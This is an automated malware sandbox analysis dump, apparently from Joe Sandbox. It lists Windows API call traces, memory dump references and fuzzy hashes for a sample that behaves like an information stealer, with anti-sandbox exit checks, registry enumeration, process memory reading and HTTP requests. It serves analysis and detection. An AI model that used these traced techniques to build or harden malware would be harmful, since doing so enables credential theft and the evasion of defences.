                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                              • String ID: CurrentBuildNumber
                                              • API String ID: 3466090806-1022791448
                                              APIs
                                              • CreateFileA.KERNEL32(>=A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413D3E,?), ref: 0041948C
                                              • GetFileSizeEx.KERNEL32(000000FF,>=A), ref: 004194A9
                                              • CloseHandle.KERNEL32(000000FF), ref: 004194B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleSize
                                              • String ID: >=A$>=A
                                              • API String ID: 1378416451-3536956848
                                              APIs
                                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 04847601
                                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 04847678
                                              • StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 048476D4
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04847719
                                              • HeapFree.KERNEL32(00000000), ref: 04847720
                                                • Part of subcall function 048494F7: vsprintf_s.MSVCRT ref: 04849512
                                              • task.LIBCPMTD ref: 0484781C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                              • String ID:
                                              • API String ID: 700816787-0
                                              APIs
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 04846537: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 04846598
                                                • Part of subcall function 04846537: StrCmpCA.SHLWAPI(?,006D6E80), ref: 048465BA
                                                • Part of subcall function 04846537: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 048465EC
                                                • Part of subcall function 04846537: HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 0484663C
                                                • Part of subcall function 04846537: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04846676
                                                • Part of subcall function 04846537: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 04846688
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 048557CF
                                              • lstrlen.KERNEL32(00000000), ref: 048557E6
                                                • Part of subcall function 04859227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 04859249
                                              • StrStrA.SHLWAPI(00000000,00000000), ref: 0485581B
                                              • lstrlen.KERNEL32(00000000), ref: 0485583A
                                              • strtok.MSVCRT(00000000,?), ref: 04855855
                                              • lstrlen.KERNEL32(00000000), ref: 04855865
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                              • String ID:
                                              • API String ID: 3532888709-0
                                              APIs
                                              • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 048575C5
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • OpenProcess.KERNEL32(001FFFFF,00000000,048577F4,004205C5), ref: 04857603
                                              • memset.MSVCRT ref: 04857651
                                              • ??_V@YAXPAX@Z.MSVCRT(?), ref: 048577A5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: OpenProcesslstrcpymemset
                                              • String ID:
                                              • API String ID: 224852652-0
                                              APIs
                                              • memset.MSVCRT ref: 00414325
                                              • RegOpenKeyExA.ADVAPI32(80000001,02CA61B0,00000000,00020119,?), ref: 00414344
                                              • RegQueryValueExA.ADVAPI32(?,02CA6720,00000000,00000000,00000000,000000FF), ref: 00414368
                                              • RegCloseKey.ADVAPI32(?), ref: 00414372
                                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414397
                                              • lstrcatA.KERNEL32(?,02CA6660), ref: 004143AB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$CloseOpenQueryValuememset
                                              • String ID:
                                              • API String ID: 2623679115-0
                                              APIs
                                              • memset.MSVCRT ref: 0485458C
                                              • RegOpenKeyExA.ADVAPI32(80000001,006D6ED8,00000000,00020119,?), ref: 048545AB
                                              • RegQueryValueExA.ADVAPI32(?,006D6AD4,00000000,00000000,00000000,000000FF), ref: 048545CF
                                              • RegCloseKey.ADVAPI32(?), ref: 048545D9
                                              • lstrcat.KERNEL32(?,00000000), ref: 048545FE
                                              • lstrcat.KERNEL32(?,006D6B68), ref: 04854612
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$CloseOpenQueryValuememset
                                              • String ID:
                                              • API String ID: 2623679115-0
                                              APIs
                                              • strtok_s.MSVCRT ref: 004137D8
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • strtok_s.MSVCRT ref: 00413921
                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02C9D528,?,004210F4,?,00000000), ref: 0041AB3B
                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpystrtok_s$lstrlen
                                              • String ID:
                                              • API String ID: 3184129880-0
                                              APIs
                                              • InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 04849CD1
                                              • InternetOpenUrlA.WININET(00000000,00421250,00000000,00000000,80000000,00000000), ref: 04849D12
                                              • InternetCloseHandle.WININET(00000000), ref: 04849D2E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$Open$CloseHandle
                                              • String ID:
                                              • API String ID: 3289985339-0
                                              APIs
                                              • __lock.LIBCMT ref: 0041B69A
                                                • Part of subcall function 0041B2BC: __mtinitlocknum.LIBCMT ref: 0041B2D2
                                                • Part of subcall function 0041B2BC: __amsg_exit.LIBCMT ref: 0041B2DE
                                                • Part of subcall function 0041B2BC: EnterCriticalSection.KERNEL32(?,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B2E6
                                              • DecodePointer.KERNEL32(0042A260,00000020,0041B7DD,?,00000001,00000000,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E), ref: 0041B6D6
                                              • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B6E7
                                                • Part of subcall function 0041C136: EncodePointer.KERNEL32(00000000,0041C393,004D5FB8,00000314,00000000,?,?,?,?,?,0041BA07,004D5FB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041C138
                                              • DecodePointer.KERNEL32(-00000004,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B70D
                                              • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B720
                                              • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B72A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                              • String ID:
                                              • API String ID: 2005412495-0
                                              APIs
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 04859E58
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 04859E71
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 04859E89
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 04859EA1
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 04859EBA
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 04859ED2
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 04859EEA
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 04859F03
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 04859F1B
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 04859F33
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 04859F4C
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 04859F64
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 04859F7C
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 04859F95
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 04841437: ExitProcess.KERNEL32 ref: 04841478
                                                • Part of subcall function 048413C7: GetSystemInfo.KERNEL32(?), ref: 048413D1
                                                • Part of subcall function 048413C7: ExitProcess.KERNEL32 ref: 048413E5
                                                • Part of subcall function 04841377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 04841392
                                                • Part of subcall function 04841377: VirtualAllocExNuma.KERNEL32(00000000), ref: 04841399
                                                • Part of subcall function 04841377: ExitProcess.KERNEL32 ref: 048413AA
                                                • Part of subcall function 04841487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 048414A5
                                                • Part of subcall function 04841487: __aulldiv.LIBCMT ref: 048414BF
                                                • Part of subcall function 04841487: __aulldiv.LIBCMT ref: 048414CD
                                                • Part of subcall function 04841487: ExitProcess.KERNEL32 ref: 048414FB
                                                • Part of subcall function 04856C77: GetUserDefaultLangID.KERNEL32 ref: 04856C7B
                                                • Part of subcall function 048413F7: ExitProcess.KERNEL32 ref: 0484142D
                                                • Part of subcall function 04857C47: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0484141E), ref: 04857C77
                                                • Part of subcall function 04857C47: RtlAllocateHeap.NTDLL(00000000), ref: 04857C7E
                                                • Part of subcall function 04857C47: GetUserNameA.ADVAPI32(00000104,00000104), ref: 04857C96
                                                • Part of subcall function 04857CD7: GetProcessHeap.KERNEL32(00000000,00000104), ref: 04857D07
                                                • Part of subcall function 04857CD7: RtlAllocateHeap.NTDLL(00000000), ref: 04857D0E
                                                • Part of subcall function 04857CD7: GetComputerNameA.KERNEL32(?,00000104), ref: 04857D26
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 04856FD1
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04856FEF
                                              • CloseHandle.KERNEL32(00000000), ref: 04857000
                                              • Sleep.KERNEL32(00001770), ref: 0485700B
                                              • CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 04857021
                                              • ExitProcess.KERNEL32 ref: 04857029
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                              • String ID:
                                              • API String ID: 2525456742-0
                                              • Opcode ID: dff8bde81555aea59465c9e16628ddb3addc1784a124ec154de877713b950503
                                              • Instruction ID: 4b8653aa053fd8e98ac2ef2d14ed189b151a9baa3c962ac9232974a16fe3d9f4
                                              • Opcode Fuzzy Hash: dff8bde81555aea59465c9e16628ddb3addc1784a124ec154de877713b950503
                                              • Instruction Fuzzy Hash: 9C312E71D04218AAEB08FBE8EC94AFD7775AF54209F544F19A912E20A0EFF47904C663
                                              APIs
                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                              • String ID:
                                              • API String ID: 2311089104-0
                                              • Opcode ID: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
                                              • Instruction ID: e28607e9d9a2a96074382c0c0d30a82733061daf82e5a8752830093732aacc78
                                              • Opcode Fuzzy Hash: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
                                              • Instruction Fuzzy Hash: 9731FC74A01209EFDB14CF94D845BEE77B5AB48304F10815AE911AB3D0D778AA91CFA6
                                              APIs
                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0484A3A3
                                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0484A3C8
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0484A3E8
                                              • ReadFile.KERNEL32(000000FF,?,00000000,048416F6,00000000), ref: 0484A411
                                              • LocalFree.KERNEL32(048416F6), ref: 0484A447
                                              • CloseHandle.KERNEL32(000000FF), ref: 0484A451
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                              • String ID:
                                              • API String ID: 2311089104-0
                                              • Opcode ID: 06cf558428df834f5adc8c7b4b2342f5685766828323e2485330cc1a7ca5d982
                                              • Instruction ID: a03439a6cbbe1182581e093979d7636e67f2fbb192477e01cabc37ccf17936ba
                                              • Opcode Fuzzy Hash: 06cf558428df834f5adc8c7b4b2342f5685766828323e2485330cc1a7ca5d982
                                              • Instruction Fuzzy Hash: 5D310FB4A4020DEFDB14DF94D889BAE77B5BF88700F108659E911AB290D774AA41CFA1
                                              APIs
                                              • __getptd.LIBCMT ref: 0041CD1A
                                                • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                                • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                              • __amsg_exit.LIBCMT ref: 0041CD3A
                                              • __lock.LIBCMT ref: 0041CD4A
                                              • InterlockedDecrement.KERNEL32(?), ref: 0041CD67
                                              • free.MSVCRT ref: 0041CD7A
                                              • InterlockedIncrement.KERNEL32(0042C558), ref: 0041CD92
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                              • String ID:
                                              • API String ID: 634100517-0
                                              • Opcode ID: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
                                              • Instruction ID: 81166cf5a2c435bb4aac1af76a8190dca09a737386ef4d0c79be19083c51ecfa
                                              • Opcode Fuzzy Hash: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
                                              • Instruction Fuzzy Hash: C2018835A817219BC721AB6AACC57DE7B60BF04714F55412BE80467790C73CA9C1CBDD
                                              APIs
                                              • __getptd.LIBCMT ref: 0485CF81
                                                • Part of subcall function 0485C507: __getptd_noexit.LIBCMT ref: 0485C50A
                                                • Part of subcall function 0485C507: __amsg_exit.LIBCMT ref: 0485C517
                                              • __amsg_exit.LIBCMT ref: 0485CFA1
                                              • __lock.LIBCMT ref: 0485CFB1
                                              • InterlockedDecrement.KERNEL32(?), ref: 0485CFCE
                                              • free.MSVCRT ref: 0485CFE1
                                              • InterlockedIncrement.KERNEL32(0042C980), ref: 0485CFF9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                              • String ID:
                                              • API String ID: 634100517-0
                                              • Opcode ID: 230712e3deecaa92b850b6e343f5c0a0bb14ee3de3d18a069ed343d21a6d6265
                                              • Instruction ID: 765e365b115ea018edd558d65846a233a28590fec91946c03d7810ced363db1c
                                              • Opcode Fuzzy Hash: 230712e3deecaa92b850b6e343f5c0a0bb14ee3de3d18a069ed343d21a6d6265
                                              • Instruction Fuzzy Hash: 9D01C435A01720ABDB21AF689844B5DB7A0BF04754F000B16EC01E71A0C7B47981CFD6
                                              APIs
                                              • strlen.MSVCRT ref: 0041719F
                                              • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041741A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004171CD
                                                • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E61
                                                • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E85
                                              • VirtualQueryEx.KERNEL32(0041758D,00000000,?,0000001C), ref: 00417212
                                              • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041741A), ref: 00417333
                                                • Part of subcall function 00417060: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00417078
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strlen$MemoryProcessQueryReadVirtual
                                              • String ID: @
                                              • API String ID: 2950663791-2766056989
                                              • Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                              • Instruction ID: d4c246fcbb90b677cbfa603dc812bd51b07a2c71a26f71c1c9cdc23e16c3c5e2
                                              • Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                              • Instruction Fuzzy Hash: CD5106B5E04109EBDB08CF98D981AEFB7B6BF88300F148159F915A7340D738AA41DBA5
                                              APIs
                                              • strlen.MSVCRT ref: 04857406
                                              • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,04857681,00000000,00420BB0,00000000,00000000), ref: 04857434
                                                • Part of subcall function 048570B7: strlen.MSVCRT ref: 048570C8
                                                • Part of subcall function 048570B7: strlen.MSVCRT ref: 048570EC
                                              • VirtualQueryEx.KERNEL32(048577F4,00000000,?,0000001C), ref: 04857479
                                              • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04857681), ref: 0485759A
                                                • Part of subcall function 048572C7: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 048572DF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strlen$MemoryProcessQueryReadVirtual
                                              • String ID: @
                                              • API String ID: 2950663791-2766056989
                                              • Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                              • Instruction ID: 7945d45747e5370da76ecdeba5c6c44f34b7fd454265748fd350da3f02409ca5
                                              • Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                              • Instruction Fuzzy Hash: 6251D6B1A00109EFDB04CF99D981AEFB7B6BF88304F14C659F919A7250D734EA11CBA1
                                              APIs
                                              • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: zn@$zn@
                                              • API String ID: 1029625771-1156428846
                                              • Opcode ID: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                              • Instruction ID: 56bd16fc9bcf92c18956b4b249a59c76870f8c01999fa8d2962da2cd55bb9a52
